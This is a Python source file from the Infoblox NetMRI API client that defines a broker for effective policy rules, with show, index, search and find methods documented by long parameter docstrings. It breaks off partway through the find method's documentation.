infoblox_netmri/api/broker/v3_6_0/effective_policy_rule_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
infoblox_netmri/api/broker/v3_6_0/effective_policy_rule_broker.py
|
IngmarVG-IB/infoblox-netmri
|
b0c725fd64aee1890d83917d911b89236207e564
|
[
"Apache-2.0"
] | null | null | null |
from ..broker import Broker
class EffectivePolicyRuleBroker(Broker):
controller = "effective_policy_rules"
def show(self, **kwargs):
"""Shows the details for the specified effective policy rule.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of effective policy rule methods. The listed methods will be called on each effective policy rule returned and included in the output. Available methods are: policy_rule_set_filter_text, policy_rule_rule_logic_text, devices, data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return effective_policy_rule: The effective policy rule identified by the specified PolicyRuleID.
:rtype effective_policy_rule: EffectivePolicyRule
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available effective policy rules. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleShortName: The policy rule short name, used on the policy status display.
:type PolicyRuleShortName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleShortName: The policy rule short name, used on the policy status display.
:type PolicyRuleShortName: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the effective policy rules as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of effective policy rule methods. The listed methods will be called on each effective policy rule returned and included in the output. Available methods are: policy_rule_set_filter_text, policy_rule_rule_logic_text, devices, data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` PolicyRuleID
:param sort: The data field(s) to use for sorting the output. Default is PolicyRuleID. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each EffectivePolicyRule. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return effective_policy_rules: An array of the EffectivePolicyRule objects that match the specified input criteria.
:rtype effective_policy_rules: Array of EffectivePolicyRule
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available effective policy rules matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleActionAfterExec: Not used.
:type PolicyRuleActionAfterExec: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleActionAfterExec: Not used.
:type PolicyRuleActionAfterExec: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleAuthor: The author of the policy rule at the time of evaluation.
:type PolicyRuleAuthor: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleAuthor: The author of the policy rule at the time of evaluation.
:type PolicyRuleAuthor: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleChangedCols: The fields that changed between this revision of the record and the previous revision.
:type PolicyRuleChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleChangedCols: The fields that changed between this revision of the record and the previous revision.
:type PolicyRuleChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleCreatedAt: The date and time the policy rule was first added to NetMRI.
:type PolicyRuleCreatedAt: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleCreatedAt: The date and time the policy rule was first added to NetMRI.
:type PolicyRuleCreatedAt: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleDescription: The description of the policy rule at the time of evaluation.
:type PolicyRuleDescription: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleDescription: The description of the policy rule at the time of evaluation.
:type PolicyRuleDescription: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleEndTime: The ending effective time of this record, or empty if still in effect.
:type PolicyRuleEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleEndTime: The ending effective time of this record, or empty if still in effect.
:type PolicyRuleEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleFirstSeenTime: The date and time when this policy rule was first seen on the NetMRI.
:type PolicyRuleFirstSeenTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleFirstSeenTime: The date and time when this policy rule was first seen on the NetMRI.
:type PolicyRuleFirstSeenTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleID: The internal NetMRI identifier for this effective policy rule.
:type PolicyRuleID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleName: The long name of the policy rule.
:type PolicyRuleName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleName: The long name of the policy rule.
:type PolicyRuleName: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleReadOnlyInd: A flag indicating whether this is a read-only policy rule.
:type PolicyRuleReadOnlyInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleReadOnlyInd: A flag indicating whether this is a read-only policy rule.
:type PolicyRuleReadOnlyInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleRemediation: The textual remediation description associated with the rule.
:type PolicyRuleRemediation: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleRemediation: The textual remediation description associated with the rule.
:type PolicyRuleRemediation: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleRuleLogic: The XML policy rule logic.
:type PolicyRuleRuleLogic: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleRuleLogic: The XML policy rule logic.
:type PolicyRuleRuleLogic: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleSetFilter: The XML SetFilter used to determine if this rule applies to a specific device.
:type PolicyRuleSetFilter: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleSetFilter: The XML SetFilter used to determine if this rule applies to a specific device.
:type PolicyRuleSetFilter: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleSeverity: The severity level (info, warning, or error) for a violation of this rule.
:type PolicyRuleSeverity: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleSeverity: The severity level (info, warning, or error) for a violation of this rule.
:type PolicyRuleSeverity: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleShortName: The policy rule short name, used on the policy status display.
:type PolicyRuleShortName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleShortName: The policy rule short name, used on the policy status display.
:type PolicyRuleShortName: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleStartTime: The starting effective time of this record.
:type PolicyRuleStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleStartTime: The starting effective time of this record.
:type PolicyRuleStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleTimestamp: The date and time this record was collected or calculated.
:type PolicyRuleTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleTimestamp: The date and time this record was collected or calculated.
:type PolicyRuleTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param PolicyRuleUpdatedAt: The date and time the policy rule was last updated in NetMRI.
:type PolicyRuleUpdatedAt: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param PolicyRuleUpdatedAt: The date and time the policy rule was last updated in NetMRI.
:type PolicyRuleUpdatedAt: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the effective policy rules as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of effective policy rule methods. The listed methods will be called on each effective policy rule returned and included in the output. Available methods are: policy_rule_set_filter_text, policy_rule_rule_logic_text, devices, data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` PolicyRuleID
:param sort: The data field(s) to use for sorting the output. Default is PolicyRuleID. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each EffectivePolicyRule. Valid values are DataSourceID, PolicyRuleID, PolicyRuleStartTime, PolicyRuleEndTime, PolicyRuleChangedCols, PolicyRuleTimestamp, PolicyRuleFirstSeenTime, PolicyRuleName, PolicyRuleDescription, PolicyRuleAuthor, PolicyRuleSetFilter, PolicyRuleRuleLogic, PolicyRuleSeverity, PolicyRuleActionAfterExec, PolicyRuleCreatedAt, PolicyRuleUpdatedAt, PolicyRuleRemediation, PolicyRuleShortName, PolicyRuleReadOnlyInd. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against effective policy rules, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, PolicyRuleActionAfterExec, PolicyRuleAuthor, PolicyRuleChangedCols, PolicyRuleCreatedAt, PolicyRuleDescription, PolicyRuleEndTime, PolicyRuleFirstSeenTime, PolicyRuleID, PolicyRuleName, PolicyRuleReadOnlyInd, PolicyRuleRemediation, PolicyRuleRuleLogic, PolicyRuleSetFilter, PolicyRuleSeverity, PolicyRuleShortName, PolicyRuleStartTime, PolicyRuleTimestamp, PolicyRuleUpdatedAt.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return effective_policy_rules: An array of the EffectivePolicyRule objects that match the specified input criteria.
:rtype effective_policy_rules: Array of EffectivePolicyRule
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available effective policy rules matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, PolicyRuleActionAfterExec, PolicyRuleAuthor, PolicyRuleChangedCols, PolicyRuleCreatedAt, PolicyRuleDescription, PolicyRuleEndTime, PolicyRuleFirstSeenTime, PolicyRuleID, PolicyRuleName, PolicyRuleReadOnlyInd, PolicyRuleRemediation, PolicyRuleRuleLogic, PolicyRuleSetFilter, PolicyRuleSeverity, PolicyRuleShortName, PolicyRuleStartTime, PolicyRuleTimestamp, PolicyRuleUpdatedAt.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleActionAfterExec: The operator to apply to the field PolicyRuleActionAfterExec. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleActionAfterExec: Not used. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleActionAfterExec: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleActionAfterExec: If op_PolicyRuleActionAfterExec is specified, the field named in this input will be compared to the value in PolicyRuleActionAfterExec using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleActionAfterExec must be specified if op_PolicyRuleActionAfterExec is specified.
:type val_f_PolicyRuleActionAfterExec: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleActionAfterExec: If op_PolicyRuleActionAfterExec is specified, this value will be compared to the value in PolicyRuleActionAfterExec using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleActionAfterExec must be specified if op_PolicyRuleActionAfterExec is specified.
:type val_c_PolicyRuleActionAfterExec: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleAuthor: The operator to apply to the field PolicyRuleAuthor. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleAuthor: The author of the policy rule at the time of evaluation. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleAuthor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleAuthor: If op_PolicyRuleAuthor is specified, the field named in this input will be compared to the value in PolicyRuleAuthor using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleAuthor must be specified if op_PolicyRuleAuthor is specified.
:type val_f_PolicyRuleAuthor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleAuthor: If op_PolicyRuleAuthor is specified, this value will be compared to the value in PolicyRuleAuthor using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleAuthor must be specified if op_PolicyRuleAuthor is specified.
:type val_c_PolicyRuleAuthor: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleChangedCols: The operator to apply to the field PolicyRuleChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleChangedCols: If op_PolicyRuleChangedCols is specified, the field named in this input will be compared to the value in PolicyRuleChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleChangedCols must be specified if op_PolicyRuleChangedCols is specified.
:type val_f_PolicyRuleChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleChangedCols: If op_PolicyRuleChangedCols is specified, this value will be compared to the value in PolicyRuleChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleChangedCols must be specified if op_PolicyRuleChangedCols is specified.
:type val_c_PolicyRuleChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleCreatedAt: The operator to apply to the field PolicyRuleCreatedAt. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleCreatedAt: The date and time the policy rule was first added to NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleCreatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleCreatedAt: If op_PolicyRuleCreatedAt is specified, the field named in this input will be compared to the value in PolicyRuleCreatedAt using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleCreatedAt must be specified if op_PolicyRuleCreatedAt is specified.
:type val_f_PolicyRuleCreatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleCreatedAt: If op_PolicyRuleCreatedAt is specified, this value will be compared to the value in PolicyRuleCreatedAt using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleCreatedAt must be specified if op_PolicyRuleCreatedAt is specified.
:type val_c_PolicyRuleCreatedAt: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleDescription: The operator to apply to the field PolicyRuleDescription. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleDescription: The description of the policy rule at the time of evaluation. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleDescription: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleDescription: If op_PolicyRuleDescription is specified, the field named in this input will be compared to the value in PolicyRuleDescription using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleDescription must be specified if op_PolicyRuleDescription is specified.
:type val_f_PolicyRuleDescription: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleDescription: If op_PolicyRuleDescription is specified, this value will be compared to the value in PolicyRuleDescription using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleDescription must be specified if op_PolicyRuleDescription is specified.
:type val_c_PolicyRuleDescription: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleEndTime: The operator to apply to the field PolicyRuleEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleEndTime: If op_PolicyRuleEndTime is specified, the field named in this input will be compared to the value in PolicyRuleEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleEndTime must be specified if op_PolicyRuleEndTime is specified.
:type val_f_PolicyRuleEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleEndTime: If op_PolicyRuleEndTime is specified, this value will be compared to the value in PolicyRuleEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleEndTime must be specified if op_PolicyRuleEndTime is specified.
:type val_c_PolicyRuleEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleFirstSeenTime: The operator to apply to the field PolicyRuleFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleFirstSeenTime: The date and time when this policy rule was first seen on the NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleFirstSeenTime: If op_PolicyRuleFirstSeenTime is specified, the field named in this input will be compared to the value in PolicyRuleFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleFirstSeenTime must be specified if op_PolicyRuleFirstSeenTime is specified.
:type val_f_PolicyRuleFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleFirstSeenTime: If op_PolicyRuleFirstSeenTime is specified, this value will be compared to the value in PolicyRuleFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleFirstSeenTime must be specified if op_PolicyRuleFirstSeenTime is specified.
:type val_c_PolicyRuleFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleID: The operator to apply to the field PolicyRuleID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleID: The internal NetMRI identifier for this effective policy rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PolicyRuleID: If op_PolicyRuleID is specified, the field named in this input will be compared to the value in PolicyRuleID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PolicyRuleID must be specified if op_PolicyRuleID is specified.
:type val_f_PolicyRuleID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PolicyRuleID: If op_PolicyRuleID is specified, this value will be compared to the value in PolicyRuleID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PolicyRuleID must be specified if op_PolicyRuleID is specified.
:type val_c_PolicyRuleID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PolicyRuleName: The operator to apply to the field PolicyRuleName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PolicyRuleName: The long name of the policy rule. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PolicyRuleName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
